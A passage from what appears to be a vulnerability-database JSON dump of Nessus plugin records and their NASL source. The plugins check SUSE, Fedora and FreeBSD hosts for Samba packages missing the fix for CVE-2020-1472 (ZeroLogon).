reference:\"libsamba-policy-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-policy0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap2-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap2-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-client-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-client-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-core-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-debugsource-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-libs-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-libs-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-winbind-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-winbind-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:23", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-09-24T00:00:00", "type": "nessus", "title": "Fedora 32 : 2:samba (2020-0be2776ed3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-0BE2776ED3.NASL", "href": "https://www.tenable.com/plugins/nessus/140760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-0be2776ed3.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140760);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-0be2776ed3\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 32 : 2:samba (2020-0be2776ed3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-0be2776ed3\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"samba-4.12.7-0.fc32\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:13", "description": "The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator access by exploiting a netlogon protocol flaw.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "nessus", "title": "FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:samba410", "p-cpe:/a:freebsd:freebsd:samba411", "p-cpe:/a:freebsd:freebsd:samba412", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "href": "https://www.tenable.com/plugins/nessus/140677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140677);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator\naccess by exploiting a netlogon protocol flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2020-1472.html\");\n # https://vuxml.freebsd.org/freebsd/24ace516-fad7-11ea-8d8c-005056a311d1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e92322b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba410\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba411\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba412\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba410<4.10.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba411<4.11.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba412<4.12.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:35", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : samba (SUSE-SU-2020:2722-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy0", "p-cpe:/a:novell:suse_linux:libsamba-policy0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-ad-dc", "p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python", "p-cpe:/a:novell:suse_linux:samba-libs-python-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-python", "p-cpe:/a:novell:suse_linux:samba-python-debuginfo", "p-cpe:/a:novell:suse_linux:samba-python3", "p-cpe:/a:novell:suse_linux:samba-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2722-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143732", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2722-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143732);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : samba (SUSE-SU-2020:2722-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202722-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?04764abc\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Python2 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP1-2020-2722=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-2722=1\n\nSUSE Linux Enterprise High Availability 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-SP1-2020-2722=1\n\nSUSE Enterprise Storage 6 :\n\nzypper in -t patch SUSE-Storage-6-2020-2722=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", 